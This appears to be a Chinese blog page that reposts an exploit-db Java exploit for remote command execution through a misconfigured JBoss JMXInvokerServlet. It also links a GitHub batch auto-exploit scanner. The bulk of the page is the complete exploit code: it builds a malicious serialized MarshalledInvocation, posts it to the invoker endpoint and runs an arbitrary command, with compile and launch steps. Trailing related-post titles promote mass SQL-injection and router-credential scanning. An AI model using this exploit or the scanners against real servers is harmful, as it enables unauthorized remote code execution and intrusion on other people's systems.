exploit-db提供出了EXP,如下:

 /*

  * JBoss JMXInvokerServlet Remote Command Execution

  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki

  *

  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).

  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"

  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"

  * and the "JMX Console" are protected or disabled.

  *

  * [FAQ]

  *

  * Q: Is my target vulnerable?

  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable

  *

  * Q: How to fix it?

  * A: Enable authentication in "jmx-invoker-service.xml"

  *

  * Q: Is this exploit version-dependent?

  * A: Unfortunately, yes. An hash value is used to properly invoke a method.

  *    At least comparing version 4.x and 5.x, these hashes are different.

  *

  * Q: How to compile and launch it?

  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java

  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker

  *    Yes, it's a Java exploit. I can already see some of you complaining....

  */

 import java.io.BufferedReader;

 import java.io.IOException;

 import java.io.InputStream;

 import java.io.InputStreamReader;

 import java.io.ObjectOutputStream;

 import java.lang.reflect.Array;

 import java.lang.reflect.Field;

 import java.lang.reflect.Method;

 import java.net.ConnectException;

 import java.net.HttpURLConnection;

 import java.net.URL;

 import javax.management.MalformedObjectNameException;

 import javax.management.ObjectName;

 import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

 public class JMXInvokerServlet {

     //---------> CHANGE ME <---------

     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1

     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";

     static final String cmd = "touch /tmp/exectest";

     //-------------------------------

     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

         System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

         //Create a malicious Java serialized object

         MarshalledInvocation payload = new MarshalledInvocation();

         payload.setObjectName(new Integer(hash));

         //Executes the MBean invoke operation

         Class<?> c = Class.forName("javax.management.MBeanServerConnection");

         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);

         payload.setMethod(method);

         //Define MBean's name, operation and pars

         Object myObj[] = new Object[4];

         //MBean object name

         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");

         //Operation name

         myObj[1] = new String("createScriptDeployment");

         //Actual parameters

         myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};

         //Operation signature

         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

         payload.setArguments(myObj);

         System.out.println("\n--[*] MarshalledInvocation object created");

         //For debugging - visualize the raw object

         //System.out.println(dump(payload));

         //Serialize the object

         try {

             //Send the payload

             URL server = new URL(url);

             HttpURLConnection conn = (HttpURLConnection) server.openConnection();

             conn.setRequestMethod("POST");

             conn.setDoOutput(true);

             conn.setDoInput(true);

             conn.setUseCaches(false);

             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");

             conn.setRequestProperty("Connection", "keep-alive");

             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");

             conn.setRequestProperty("Content-Type", "application/octet-stream");

             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");

             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

             ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());

             wr.writeObject(payload);

             System.out.println("\n--[*] MarshalledInvocation object serialized");

             System.out.println("\n--[*] Sending payload...");

             wr.flush();

             wr.close();

             //Get the response

             InputStream is = conn.getInputStream();

             BufferedReader rd = new BufferedReader(new InputStreamReader(is));

             String line;

             StringBuffer response = new StringBuffer();

             while ((line = rd.readLine()) != null) {

                 response.append(line);

             }

             rd.close();

             if (response.indexOf("Script Name") != -1) {

                 System.out.println("\n--[*] \"" + cmd + "\" successfully executed");

             } else {

                 System.out.println("\n--[!] An invocation error occured...");

             }

         } catch (ConnectException cex) {

             System.out.println("\n--[!] A connection error occured...");

         } catch (IOException ex) {

             ex.printStackTrace();

         }

     }

     /*

      * Raw dump of generic Java Objects

      */

     static String dump(Object o) {

         StringBuffer buffer = new StringBuffer();

         Class oClass = o.getClass();

         if (oClass.isArray()) {

             buffer.append("[");

             for (int i = 0; i < Array.getLength(o); i++) {

                 if (i > 0) {

                     buffer.append(",\n");

                 }

                 Object value = Array.get(o, i);

                 buffer.append(value.getClass().isArray() ? dump(value) : value);

             }

             buffer.append("]");

         } else {

             buffer.append("{");

             while (oClass != null) {

                 Field[] fields = oClass.getDeclaredFields();

                 for (int i = 0; i

                         < fields.length; i++) {

                     if (buffer.length() > 1) {

                         buffer.append(",\n");

                     }

                     fields[i].setAccessible(true);

                     buffer.append(fields[i].getName());

                     buffer.append("=");

                     try {

                         Object value = fields[i].get(o);

                         if (value != null) {

                             buffer.append(value.getClass().isArray() ? dump(value) : value);

                         }

                     } catch (IllegalAccessException e) {

                     }

                 }

                 oClass = oClass.getSuperclass();

             }

             buffer.append("}");

         }

         return buffer.toString();

     }

 }

批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit

JBOSS批量扫描的更多相关文章

  1. Burpsuite+sqlmap批量扫描sql漏洞

    1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描     python sqlmap.py -l 文件名 --batch -smart     batch:自 ...

  2. BurpSuite导出log配合SQLMAP批量扫描注入点

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  3. 批量扫描互联网无线路由设备telnet,并获取WIFI密码

    批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513

  4. sqlmap批量扫描burpsuite请求日志记录

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  5. BBScan — 一个信息泄漏批量扫描脚本

    github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPsca ...

  6. wwwscan网站目录文件批量扫描工具

    准备一个比赛样题里面给的一个扫描的工具: 不知道怎么用就上网百度了一下果然有关于这个软件的两篇介绍(感觉写的很好),第一篇介绍的应该和我的工具一样,也给了例子(现在Google不能访问了)和参数介绍, ...

  7. sqlmap批量扫描burpsuite拦截的日志记录

    1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自 ...

  8. 批量扫描IP端口程序 (适用于window&linux)

    批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名 ...

  9. 从Excel获取整列内容进行批量扫描

    实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存 ...

随机推荐

  1. 作为WEB工程师,我们是不是应该积极的推进一下用户浏览器的使用体验?

    为什么会写这篇文章,其实是有原因的.目前我工作的公司的Web网站仅支持IE8以上的版本,然后我们经常接到客户的反馈,说为什么在他浏览器当中flash怎么显示不了,或者为什么在他浏览器中有这样那样的问题 ...

  2. Oracle 10g dataguard broker 配置

    环境: OS:rhel6.3_64bit DB:Oracle10gR2 ————————————————————————dataguard broker配置—————————————————————— ...

  3. Thinking In Java 读书笔记

    面向对象语言,五个基本特性: 1)万物皆为对象. 2)程序是对象的集合,他们通过发送消息来告知彼此所要做的. 3)每个对象都有自己的由其他对象所构成的存储. 4)每个对象都拥有其类型.即:每个对象都是 ...

  4. TI CC254x BLE教程 3

    通用属性配置(Generic Attribute Profiles) 1. 数据在services里面以特征字(characteristics)的形式展示出来 如你所见, 特征字包含属性(Proper ...

  5. eclipse项目中启动项目无法载入类

    在eclipse 项目中,当载入jar包后,加载里面的包,可以找到此类,但是编译运行的时候报错java.lang.ClassNotFoundException: 1,路径名未写正确: 2,配置出错; ...

  6. PHP serialize & JSON 解析

    对于JSON(JavaScript Object Notation)大家应该不陌生,它是一种轻量级的数据交换格式.易于人阅读和编写.同时也易于机器解析和生成.它基于JavaScript Program ...

  7. jquery 当前链接激活传递参数|div的切换显示

    一.链接激活时传递参数 $("a").click(function(){ var obj=$(this).attr("field"); //获取当前field ...

  8. css缩写

    颜色: 16进制的色彩值为六位数,如果每两位的值相同,可以缩写一半. 如:#000000=#000: #223344=#234: 盒子的尺寸: 如margin:value; 一个值表示所有边,两个值表 ...

  9. 【转】Android WebView 播放视频总结

    今天发现 WebView里播放优酷的视频点击播放按钮后没反应,于是看官方文档和搜索解决,下面是我在别人基础上做的补充:   android webView 无法播放视频,无法暂停,继续播放视频问题,无 ...

  10. 20150601_Andriod 打开新窗体

    <?xml version="1.0" encoding="utf-8"?><manifest xmlns:android="htt ...